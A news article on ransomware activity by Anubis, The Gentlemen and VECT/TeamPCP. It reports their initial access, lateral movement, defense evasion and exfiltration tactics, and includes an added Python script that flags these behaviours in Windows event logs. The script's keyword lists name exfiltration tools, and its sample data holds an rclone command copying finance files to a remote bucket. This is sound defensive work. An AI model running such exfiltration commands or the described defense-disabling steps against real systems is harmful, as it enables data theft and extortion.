Ransomware Resurgence: Anubis Exploits Citrix Bleed 2, The Gentlemen Uses 0-Day, and VECT Forms New Alliances
Recent reports highlight a significant uptick in ransomware activity, with the **Anubis** operation leveraging the critical **Citrix Bleed 2** vulnerability for initial access. Concurrently, **The Gentlemen** RaaS group is exploiting a zero-day in a third-party driver, while new partnerships, such as between **VECT** and **TeamPCP**, signal an evolving threat landscape.

Threat actors associated with the **Anubis** ransomware operation have been observed exploiting the **Citrix Bleed 2** (**CVE-2025-5777**) vulnerability to gain initial access to target networks.
According to a report from **Arctic Wolf**, **Anubis** affiliates employ varied tactics but consistently utilize legitimate Remote Management and Monitoring (RMM) tools, credential access, and hands-on-keyboard procedures for lateral movement.
"**Anubis** affiliates repeatedly abused legitimate remote access and administration tools, including **ScreenConnect**, **Zoho Assist**, **MeshAgent**, **Remotely**, **UltraVNC**, and **Total Software Deployment**, to blend in with normal IT activity while maintaining control of victim systems," **Arctic Wolf** stated.
### Anubis: A Rebranded Threat with Aggressive Tactics
**Anubis** is a ransomware-as-a-service (RaaS) group that emerged in late 2024, rebranding from **Sphinx** ransomware. The group formally announced its operation on the **Ransomware and Advanced Malware Protection (RAMP)** underground forum in February 2025.
Data from **Ransomware.Live** indicates that the group has claimed 91 victims on its data leak site, with 11 reported in June 2026 alone. Targeted sectors include healthcare, business services, manufacturing, technology, and financial services, with over 50% of victims located in the U.S.
A July 2025 report by **Rubrik Zero Labs** highlighted **Anubis**'s attractive profit splits for affiliates (80% of ransom) and an irreversible data-wiping feature. This feature, activated via the `/WIPEMODE` module, reduces files to 0 KB, significantly increasing pressure on victims to pay.
### Initial Access and Lateral Movement
The **Anubis** intrusions observed this year involve both the use of valid VPN credentials and the exploitation of **CVE-2025-5777** (CVSS score: 9.3). This critical flaw in **Citrix NetScaler ADC** and **Gateway** allows attackers to bypass authentication when the appliance is configured as a Gateway or AAA virtual server.
The source of the VPN credentials remains unconfirmed but could stem from prior compromises, initial access brokers (IABs), credential stuffing, or information stealer activity.
"In addition to **CitrixBleed 2** exploitation, valid **Cisco AnyConnect** VPN logins were observed from several hosting ASNs," **Arctic Wolf** explained. "Malicious VPN authentication was then followed by login activity involving **RDP** and **SMB**, leading to credential access, **PsExec** service creation, RMM deployment, and ultimately invoking cloud-transfer tooling for exfiltration."
Lateral movement is often facilitated by **RDP** and **PsExec**, followed by the deployment of legitimate RMM tools for persistent access and stealthy operations. Some intrusions also configure a **Cloudflare Tunnel** (**cloudflared**) to establish covert tunnels to victim environments.
### Data Exfiltration and Defense Evasion
The subsequent phase involves credential gathering for deeper access, followed by the installation of tools like **S3 Browser**, **rclone**, **s5cmd**, **WinSCP**, and **PuTTY** for data exfiltration. Concurrently, attackers disable system defenses and attempt to complicate forensic analysis.
"These techniques included **Windows Defender** real-time protection disablement, **SophosUninstall** activity, **PCHunter**-related artifacts, and log clearing or manipulation across multiple systems," the cybersecurity company detailed. "In at least one intrusion, an **Anubis** encryptor was deleted after execution, reducing the availability of on-disk payload artifacts for later analysis."
### The Gentlemen's Go Backdoor and BYOVD 0-Day Exploit
**Kaspersky** recently detailed **The Gentlemen** RaaS group's methods, which include exploiting known vulnerabilities, using stolen/weak credentials, and deploying a **Go**-based backdoor for remote command execution. The group employs Group Policy or **PsExec** for lateral movement and utilizes the bring your own vulnerable driver (**BYOVD**) technique for defense evasion.
The backdoor collects system information, exfiltrates it to an external server, and awaits operator commands. This functionality allows **The Gentlemen**'s operators to pivot within target networks and expand their scanning coverage.
**Expel** further revealed that **The Gentlemen** has weaponized a zero-day vulnerability in the little-known third-party driver **ktapi.sys**, part of an API developed by **Kontron**. This **BYOVD** exploit grants kernel-level access, bypasses **Windows** security, and kills protected security processes from vendors like **Microsoft**, **ESET**, **Palo Alto Networks**, and **SentinelOne**.
Marcus Hutchins, principal threat researcher at **Expel**, emphasized the severity: "**BYOVD** continues to be a huge threat to enterprises, enabling attackers to disable state-of-the-art endpoint security systems in seconds. Even using the latest **Windows** version, with all exploit mitigations enabled, does not provide complete protection."
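The two intrusion chains reported above (Anubis: PsExec service creation, Defender disablement, RMM and exfiltration tooling, Cloudflare Tunnel; The Gentlemen: loading the vulnerable ktapi.sys driver) share a defensive shape: several individually low-signal Windows events on one host. The following is an added illustration, not tooling from Arctic Wolf, Expel or Kaspersky, of correlating such events per host. The event records are constructed with simplified field names (Windows System log 7045 for service installation, Windows Defender operational event 5001 for real-time protection disabled, Sysmon event 1 for process creation, Sysmon event 6 for driver load), and the keyword lists are only the tool names the reporting mentions, so they need baselining against sanctioned RMM software and Kontron hardware before use.

```python
from collections import defaultdict

# Keyword lists built from the tools named in the reporting above, lower-cased
# and matched as substrings of the process image path (heuristic, not exhaustive).
RMM_KEYWORDS = ("screenconnect", "zohoassist", "zoho assist", "meshagent",
                "remotely", "ultravnc", "total software deployment")
EXFIL_KEYWORDS = ("rclone", "s5cmd", "winscp", "putty", "s3browser", "s3 browser")
# Driver named by Expel as the BYOVD component used by The Gentlemen; a legitimate
# copy may exist on Kontron hardware, so the rule is a review item, not a verdict.
SUSPECT_DRIVERS = ("ktapi.sys",)


def _image(ev):
    return str(ev.get("image", "")).lower()


def classify(ev):
    """Return the detection tag for one event record, or None if it matches nothing."""
    src, eid = ev.get("source"), ev.get("event_id")
    if src == "System" and eid == 7045:
        # Service installed; PsExec registers a service named PSEXESVC by default.
        if "psexesvc" in str(ev.get("service_name", "")).lower() or "psexesvc" in _image(ev):
            return "psexec_service_created"
    elif src == "Defender" and eid == 5001:
        # Microsoft-Windows-Windows Defender/Operational 5001: real-time protection disabled.
        return "defender_realtime_disabled"
    elif src == "Sysmon" and eid == 1:
        img, cmd = _image(ev), str(ev.get("command_line", "")).lower()
        if any(k in img for k in RMM_KEYWORDS):
            return "rmm_tool_executed"
        if any(k in img for k in EXFIL_KEYWORDS):
            return "exfil_tool_executed"
        if "cloudflared" in img and "tunnel" in cmd:
            return "cloudflared_tunnel"
    elif src == "Sysmon" and eid == 6:
        # Sysmon 6 (driver loaded); compare the basename of the loaded image.
        driver = str(ev.get("image_loaded", "")).lower().rsplit("\\", 1)[-1]
        if driver in SUSPECT_DRIVERS:
            return "byovd_driver_loaded"
    return None


def triage(events):
    """Group detections by host. Three or more distinct tags on one host, or any
    suspect driver load, is the combination worth escalating for investigation."""
    per_host = defaultdict(set)
    for ev in events:
        tag = classify(ev)
        if tag:
            per_host[ev["host"]].add(tag)
    result = {}
    for host, tags in per_host.items():
        escalate = len(tags) >= 3 or "byovd_driver_loaded" in tags
        result[host] = {"tags": sorted(tags), "escalate": escalate}
    return result


# Constructed sample events (not real telemetry) covering both reported chains.
SAMPLE_EVENTS = [
    {"host": "WS01", "source": "System", "event_id": 7045,
     "service_name": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"host": "WS01", "source": "Defender", "event_id": 5001},
    {"host": "WS01", "source": "Sysmon", "event_id": 1,
     "image": "C:\\Users\\Public\\rclone.exe",
     "command_line": "rclone copy C:\\Finance remote:bucket"},
    {"host": "WS01", "source": "Sysmon", "event_id": 1,
     "image": "C:\\ProgramData\\cloudflared.exe",
     "command_line": "cloudflared tunnel run"},
    {"host": "SRV02", "source": "Sysmon", "event_id": 6,
     "image_loaded": "C:\\Users\\Public\\ktapi.sys"},
    {"host": "WS03", "source": "Sysmon", "event_id": 1,
     "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for host, finding in triage(SAMPLE_EVENTS).items():
        print(host, finding)
```

Run stand-alone it reports WS01 with four tags and SRV02 with the driver-load tag, both marked for escalation, while WS03 produces nothing. Substring matching on image paths will also fire on sanctioned RMM deployments, so in practice the keyword lists should exclude tools the organisation itself uses, and the PsExec rule should be extended to the non-default service names attackers can choose.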
### VECT and TeamPCP's Ransomware Partnership

**Sophos Counter Threat Unit** investigated a new partnership between **VECT** and **TeamPCP**, announced in March 2026. This alliance aims to combine credential theft obtained through supply chain attacks with ransomware deployment.
"The formal partnership between **TeamPCP** and **VECT** allows **VECT** to deploy ransomware across all organizations compromised in the **Trivy** and **LiteLLM** supply chain attacks," **Sophos** reported. Prior to this, **TeamPCP** operated under the **CipherForce** brand, which listed six victims in February 2026 before rebranding.
Recent analyses by **Check Point** and **JUMPSEC** have identified implementation flaws in **VECT**'s encryptor, causing files larger than 128 KB to be permanently destroyed rather than encrypted. **TeamPCP** responded by claiming they never used **VECT**'s encryptor, asserting ownership of their "own private locker," **CipherForce**.
Despite the technical shortcomings, **Sophos** notes that "The **VECT**/**TeamPCP** alliance represents a meaningful shift in the ransomware threat landscape, even accounting for the technical shortcomings that undermine its operational effectiveness."